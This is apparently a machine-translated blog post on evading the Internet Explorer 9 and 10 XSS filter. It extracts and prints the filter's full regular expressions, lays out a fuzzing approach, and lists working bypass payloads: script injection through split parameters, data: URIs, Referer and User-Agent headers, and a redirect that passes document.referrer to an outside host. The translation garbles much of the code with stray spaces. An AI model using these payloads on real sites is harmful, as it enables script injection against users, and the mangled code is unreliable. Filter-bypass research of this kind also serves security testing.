0x00 background
Microsoft has added xss Filter since IE8 beta2. Like most security products, the protection countermeasure is to use rules to filter Attack codes. Based on the availability and efficiency considerations, add the blacklist and whitelist policies (same-origin policies ).
After several generations of updates and tests by a large number of hack enthusiasts (Microsoft prefers to attract some talents to help find vulnerabilities), IE9 has achieved a better improvement. The following mainly targets IE9 and IE10.
0x01 find the root cause
How IE xss filter works
Its Process
There are many steps to verify bypass, such as the problems found by 80 sec.
Http://www.80sec.com/ie8-security-alert.html
Expand the xss filter Bypass first.
Many people have a good character, so you can combine them as needed. The following code is applicable to people like me who really can handle it. You need to know the xss Filter Regular Expression of IE.
0x02 extract Regular Expressions
Here we provide several methods to find the Regular Expression of IE xss Filter. (Ie xss filter regx exists in the system kernel mshtml. dll module ).
You can use notepad ++ textfx in hexadecimal notation to view the search result. (Search for 'SC {')
Or use winhex (the author's favorite tool) (search for 'SC {')
However, we strongly recommend that you familiarize yourself with IDApro (the reason is that IDApro is a useful tool when you study other applications such as webkit or andriod later)
A console command for a foreigner blog is very practical.
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
Here, we get the xssfilter regx of IE9 2013 \ 2.
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}{<st{y}le.*?>.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))}{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))}{<OB{J}ECT[ /+\t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+\t]*=}{<AP{P}LET[ /+\t].*?code[ /+\t]*=}{[ /+\t\"\'`]data{s}rc[ +\t]*?=.}{<BA{S}E[ /+\t].*?href[ /+\t]*=}{<LI{N}K[ /+\t].*?href[ /+\t]*=}{<ME{T}A[ /+\t].*?http-equiv[ /+\t]*=}{<[?]?im{p}ort[ /+\t].*?implementation[ /+\t]*=}{<EM{B}ED[ /+\t].*?((src)|(type)).*?=}{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<is{i}ndex[ /+\t>]}{<fo{r}m.*?>}{<sc{r}ipt.*?[ /+\t]*?src[ /+\t]*=}{<sc{r}ipt.*?>}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))({m}|(\\u00{6}D))(e|(\\u0065)))).*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
Regx of IE10 2013 \ 5
{<sc{r}ipt.*?>}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065))(O|(\\u004[Ff]))(f|(\\u0066)))).*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\x53))[^a-z0-9]*(t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*(r|(\\u0072)|(\\162)|(\\x72))[^a-z0-9]*(i|(\\u0069)|(\\151)|(\\x69))[^a-z0-9]*(n|(\\u006E)|(\\156)|(\\x6E))[^a-z0-9]*(g|(\\u0067)|(\\147)|(\\x67)))).*?:}{<AP{P}LET[ /+\t>]}{<OB{J}ECT[ /+\t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+\t]*=}{<BA{S}E[ /+\t].*?href[ /+\t]*=}{[ /+\t\"\'`]data{s}rc[ +\t]*?=.}{<LI{N}K[ /+\t].*?href[ /+\t]*=}{<[?]?im{p}ort[ /+\t].*?implementation[ /+\t]*=}{<ME{T}A[ /+\t].*?http-equiv[ /+\t]*=}{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}{<EM{B}ED[ /+\t].*?((src)|(type)).*?=}{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<is{i}ndex[ /+\t>]}{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<sc{r}ipt.*?[ /+\t]*?src[ /+\t]*=}{<fo{r}m.*?>}{(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&#x?0*((66)|(42)|(98)|(62));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}{(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}{<st{y}le.*?>.*?((@[i\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))))}{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))}
After observing the changes from IE9 to IE10, we can see that IE10 has updated a lot of regular expressions compared with IE9.
It can be seen that the IE regular expression is an ATL series. Webkit uses JSCRE (based on pcre ). Chrome also used jscre in the early days, and Irregexp was used in later 09 years.
Through regular expressions, we can test some bypass statements.
Take IE9 as an example:
Regx1 = \ [\ "\ '\] \ [\] * ([^ a-z0-9 ~ _: \ '\ "]) | (In )).*? (Location ).*? = (Old regular) Bypass: "+ {valueOf: location, toString: []. join, 0: 'jav \ x61script: alert \ x280) ', length: 1} // location ("http://xss.me /");
For example, IE's complex parameter bypass:
param1=<script>prompt(9);/*¶m2=*/</script>
Recently, the 32-bit code of account.google.com was bypassed at http://zone.wooyun.org/content/4448.
What's interesting is: I think Japanese people like unicode encoding. I have seen very useful unicode encoding before (\ u1d2e \ u1d35 \ u1d33 \ u1d2e \ u1d35 \ u1d3f \ u1d30) reset the BIGBIRD user password.
Americans prefer this kind of deformation.
<script/src="data:text/javascript,o={window:'/XSS/'};prompt(o['window']);"></script>
Lao Mao prefers to use various special characters (from the above personal opinions ).
0x03 Fuzz
A simple browser observation does not allow efficient bypass operations.
Convert to script
Now, after I change python, I suddenly realize that python's regular expression is pcre! Fortunately, the filter of webkit is based on pcre (the next time the content is written to webkit ).
Microsoft has always written a fuzz program with C ++ for fuzz testing.
Usage. IEfilter.txt is the regular expression of IE. Bypasstest.txt is a bypass statement. The result and console interface programs Save the output results.
Downloadlink: http://pan.baidu.com/share/link? Consumer id = 1243023532 & uk = 1259968226
Bypastest content can be generated by yourself. If you have used spike before, you can directly borrow the previous payload and method.
Here we provide the following ideas for generating payload:
1. special characters: [0x09, 0x0A-0x0D, 0x20, 0xA0] 2. different codes: xc2xb4xe2x80x99xe2x80, and even malformed codes:, 3, and 4. uncommon functions 4. boundary variable
The rest will be studied by yourself.
0x04 share some
Welcome to communicate with me or write articles (litre, litre, litre !)
Tips from outside China. (pay more attention to foreign technical blogs or forums)
Tip1: var url = "htpp: // xss. cx/default. aspx? Xss = "+ encodeURIComponent (document. referrer)"; if (window! = Top) {top. location. href = url;} else document. location = url; Tip2: <script/src = "data: text/javascript, o = {window: '/XSS/'}; prompt (o ['window']); "> </script> Tip3: <body/onload =" @ set @ edevil = 1; @ if (@ edevil) eval (confirm (@ edevil) @ end; "> Tip4:"> <script> alert (document. location) </script> (webkit) Tip5: "-prompt (document. location)-"(webkit) Tip6: Referer: http://www.google.com/search? Hl = en & q = xss "> <script> prompt (9) </script> (webkit) Tip7: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; windows NT 6.0) xss "> <script> prompt (9) </script> (webkit) just studied this
Refer:
Http://blogs.technet.com/ B /srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx http://www.80sec.com